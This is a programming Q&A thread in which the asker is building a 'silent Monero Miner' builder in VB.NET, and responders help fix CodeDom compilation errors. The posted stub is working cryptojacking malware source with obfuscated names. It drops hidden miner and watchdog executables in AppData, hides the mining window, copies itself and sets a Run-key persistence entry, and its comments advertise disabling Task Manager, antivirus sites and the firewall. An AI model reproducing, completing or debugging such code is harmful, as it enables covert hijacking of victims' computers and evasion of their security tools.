# VB.net CodeDom Compiler (Won't compile and not throwing any exceptions

Tags: vb.net, compiler-warnings, codedom

I am making a builder for a silent Monero Miner, My stub won't compile and it isn't throwing any exceptions.

Builder.VB

```
Public Class builder
    Private Sub Button1_Click(sender As Object, e As EventArgs) Handles compileBTN.Click
        Dim disabler As String = ""
        Dim hidden As String = ""
        Dim good As String = ""

        If disablerCB.Checked Then
            disabler = "True"
        Else
            disabler = "False"
        End If

        If hiddenCB.Checked Then
            hidden = "True"
        Else
            hidden = "False"
        End If

        If goodCB.Checked Then
            good = "True"
        Else
            good = "False"
        End If

        Try

            SaveFileDialog1.ShowDialog()
        Dim compiler As System.CodeDom.Compiler.ICodeCompiler = New VBCodeProvider().CreateCompiler
        Dim parameters As New System.CodeDom.Compiler.CompilerParameters
        parameters.ReferencedAssemblies.Add("System.Windows.Forms.dll")
        parameters.ReferencedAssemblies.Add("NegJECv.exe")
        parameters.ReferencedAssemblies.Add("stub.exe")
        parameters.GenerateExecutable = True
        parameters.OutputAssembly = SaveFileDialog1.FileName
        parameters.CompilerOptions = " / target: winexe"
            Dim results As System.CodeDom.Compiler.CompilerResults = compiler.CompileAssemblyFromSource(parameters, My.Resources.build.Replace("'False1", disabler).Replace("'False2", hidden).Replace("'True1", good).Replace("'addy", TextBox1.Text).Replace("'x", TextBox2.Text).Replace("'pool.minexmr.com:7777", TextBox3.Text))
        Catch ex As Exception
            MessageBox.Show(ex.ToString)
        End Try
    End Sub

    Private Sub helpBTN1_Click(sender As Object, e As EventArgs) Handles helpBTN1.Click
        MessageBox.Show("Checked:" + Environment.NewLine + "Disables task manager and blocks access to well known AV sites" + Environment.NewLine + "Unchecked:" + Environment.NewLine + "Disable", "Help")
    End Sub

    Private Sub helpBTN2_Click(sender As Object, e As EventArgs) Handles helpBTN2.Click
        MessageBox.Show("Checked:" + Environment.NewLine + "Hides the mining window" + Environment.NewLine + "Unchecked:" + Environment.NewLine + "Makes mining window visible", "Help")
    End Sub

    Private Sub helpBTN3_Click(sender As Object, e As EventArgs) Handles helpBTN3.Click
        MessageBox.Show("Checked:" + Environment.NewLine + "If GPU is not good mine anyway" + Environment.NewLine + "Unchecked:" + Environment.NewLine + "Don't mine if GPU isn't good", "Help")
    End Sub
End Class
```

build.txt

```
Imports System.IO
Imports System
Imports System.Windows.Forms
Imports System.Management
Imports System.Net
Imports System.Runtime.InteropServices
Imports System.Security.Principal
Imports System.Threading
Imports Microsoft.Win32

' Codename: Armageddon

Public Class EntryPoint

    ' ID of the worker, and computer motherboard.
    Public eKVbBVRUR

    '''''''''' ----- Start of Config ---- ''''''''''

    ' ENABLE THIS IF YOU WANT VIRUS SCANNING WEBSITES, AND FIREWALL DISABLED IF RAN AS ADMIN!
    Public UTReGHEbz = 'False1

    ' True makes the CMD window hidden, and false makes the CMD window show.
    ' NOTE: It's recommended you make it hidden, so the user can't just close the window.
    Public zgeKTeeIl = 'False2

    ' The password for the miner pool.
    ' NOTE: DO NOT CHANGE IF YOU'RE USING THE DEFAULT POOL, OR USING ONE WITHOUT A PASS!
    Public GfT3mNqzJ = "'x"

    ' LOOK HERE: TAKEN OUT FOR NOW!
    ' If the GPU isn't good it'll still try to mine, True = mine anyway, False = Don't mine.
    Public jlaSBWwvP = 'True1

    ' Monero miner pool
    Public yDd4mcvlX = "'pool.minexmr.com:7777"

    ' Monero miner address.
    Public tU4BhdNSC = "'addy"

    '''''''''' ----- End of Config ---- ''''''''''

    Public Shared Sub Main()

        Thread.Sleep(350)

        Try

            Dim p1() As Process

            p1 = Process.GetProcessesByName("j2n6e61Ws")

            If p1.Count > 0 Then

                Exit Sub
            Else

            End If

        Catch
        End Try


        Try

            Dim p2() As Process

            p2 = Process.GetProcessesByName("vjHG3JJVV")

            If p2.Count > 0 Then

                Try
                    Exit Sub

                Catch ex As Exception

                End Try

            Else

            End If

        Catch
        End Try

        Try

            Dim V8A7qHAYv As New Threading.Thread(AddressOf zUKDexMlO79V)
            V8A7qHAYv.Priority = Threading.ThreadPriority.Highest
            V8A7qHAYv.Start()

        Catch
        End Try

        Try

            Dim ugF3znX9F As New Threading.Thread(AddressOf r2Qt45RyL)
            ugF3znX9F.Priority = Threading.ThreadPriority.AboveNormal
            ugF3znX9F.Start()

        Catch ex As Exception
        End Try

    End Sub

    Sub r2Qt45RyL()

        Try
            If Not IO.Directory.Exists("C:\Users\" + Environment.UserName + "\AppData\Roaming\RegMak") Then
                IO.Directory.CreateDirectory("C:\Users\" + Environment.UserName + "\AppData\Roaming\RegMak")
            End If
        Catch ex As Exception

        End Try


        ' Miner.
        Dim F396LOkCU As New WebClient
        Dim mtHLNByn5 = My.Resources.stub


        Try

            If IO.File.Exists("C:\Users\" + Environment.UserName + "\AppData\Roaming\RegMak\j2n6e61Ws.exe") Then
                IO.File.Delete("C:\Users\" + Environment.UserName + "\AppData\Roaming\RegMak\j2n6e61Ws.exe")
            End If

        Catch ex As Exception

        End Try


        Try
            ' REGSVR.EXE
            If IO.File.Exists("C:\Users\" + Environment.UserName + "\AppData\Roaming\RegMak\vjHG3JJVV.exe") Then

                IO.File.Delete("C:\Users\" + Environment.UserName + "\AppData\Roaming\RegMak\vjHG3JJVV.exe")

            End If

        Catch ex As Exception
        End Try

        Try

            IO.File.WriteAllBytes("C:\Users\" + Environment.UserName + "\AppData\Roaming\RegMak\j2n6e61Ws.exe", mtHLNByn5)
            IO.File.SetAttributes("C:\Users\" + Environment.UserName + "\AppData\Roaming\RegMak\j2n6e61Ws.exe", IO.FileAttributes.Hidden)

        Catch ex As Exception

        End Try

        ' WATCHDOG, AND KILLER FOR PROCESSES.
        Dim rJVOJf4l2 As New WebClient
        Dim nL54i2qa9 = My.Resources.NegJECmVd

        Try

            IO.File.WriteAllBytes("C:\Users\" + Environment.UserName + "\AppData\Roaming\RegMak\vjHG3JJVV.exe", nL54i2qa9)
            IO.File.SetAttributes("C:\Users\" + Environment.UserName + "\AppData\Roaming\RegMak\vjHG3JJVV.exe", IO.FileAttributes.Hidden)

        Catch ex As Exception

        End Try

        Try
            Dim DwlxThHro As New ProcessStartInfo("C:\Users\" + Environment.UserName + "\AppData\Roaming\RegMak\j2n6e61Ws.exe")

            If zgeKTeeIl = True Then

                DwlxThHro.CreateNoWindow = True
                DwlxThHro.WindowStyle = ProcessWindowStyle.Hidden

            End If

            DwlxThHro.Arguments = " --safe -B -o " & yDd4mcvlX & " -u " & tU4BhdNSC & " -p " & GfT3mNqzJ

            Process.Start(DwlxThHro)

        Catch
        End Try


        Dim t5 As New Threading.Thread(AddressOf pre)
        t5.Start()
    End Sub

    Sub pre()
        Thread.Sleep(2500)

        Try

            Process.Start("C:\Users\" + Environment.UserName + "\AppData\Roaming\RegMak\vjHG3JJVV.exe")

        Catch ex As Exception
        End Try
    End Sub

    Sub zUKDexMlO79V()

        Thread.Sleep(2500)

        Threading.Thread.Sleep(2000)

        Dim ZrgFJa4Je = Application.ExecutablePath

        Try
            FileCopy(ZrgFJa4Je, "C:\Users\" + Environment.UserName + "\AppData\Roaming\KE83ZLNVN.exe")

        Catch ex As Exception

        End Try

        Try
            IO.File.SetAttributes("C:\Users\" + Environment.UserName + "\AppData\Roaming\KE83ZLNVN.exe", IO.FileAttributes.Hidden)
        Catch ex As Exception

        End Try

        Try
            Registry.SetValue("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "9KEuY9gqP", "C:\Users\" + Environment.UserName + "\AppData\Roaming\RegMak\vjHG3JJVV.exe", RegistryValueKind.String)
        Catch
        End Try

    End Sub

End Class
```

Comment: please post your codes here

Comment: Won't let me to i've had to post to pastebin

Comment: ow..w8 thn.......

Comment: If it does not compile, you cannot run it. How is it supposed to throw an exception? What you can get are compiler errors and warnings. Explain exactly what happens. Are you getting compiler errors? Are you getting red squiggles in the code?

Comment: I am getting none of the above, I moved my code into a module as a test and it compiled fine with MsBuild

Answer (score 1):

After calling

```
Dim results As System.CodeDom.Compiler.CompilerResults = 
    compiler.CompileAssemblyFromSource(...
```

`results.Errors` contains 2 errors.

> (0) = {vbc : Command line (0,0) : error BC2017: could not find library 'NegJECv.exe'}
>   (1) = {vbc : Fatal (0,0) : error BC2000: compiler initialization failed unexpectedly: 0x80070002}

Probably you should specify the file path to `NegJECv.exe` if the same error occurs on your system.

You should add the following lines to be informed about build errors:

```
If results.Errors.Count > 0 Then
    Dim messages = From err In results.Errors.Cast(Of CompilerError)
                   Select (err.ToString())
    Dim msg = String.Join(vbCrLf, messages)
    MessageBox.Show(msg, $"{results.Errors.Count} errors encountered during build")
End If
```

Comment: The build class is the builder.vb (windows form)

Comment: I was missing something like `Public Partial Class Builder Inhertis Form`, which made me think it was not in a form. But apparently VB is different from C# in this point.

Comment: about the could not find library 'NegJECv.exe'}, This file is in my resources folder and is referenced?

Comment: This error of course happened on my system, because I don't have this file. Are you getting compile errors and specifically this one? If yes, the compiler does not find this file in the file system. **The CodeDom Compiler does not know anything about your project settings and references**. It does not even know that it is running inside your application. Therefore you must provide full file paths to all the files involved in the build process..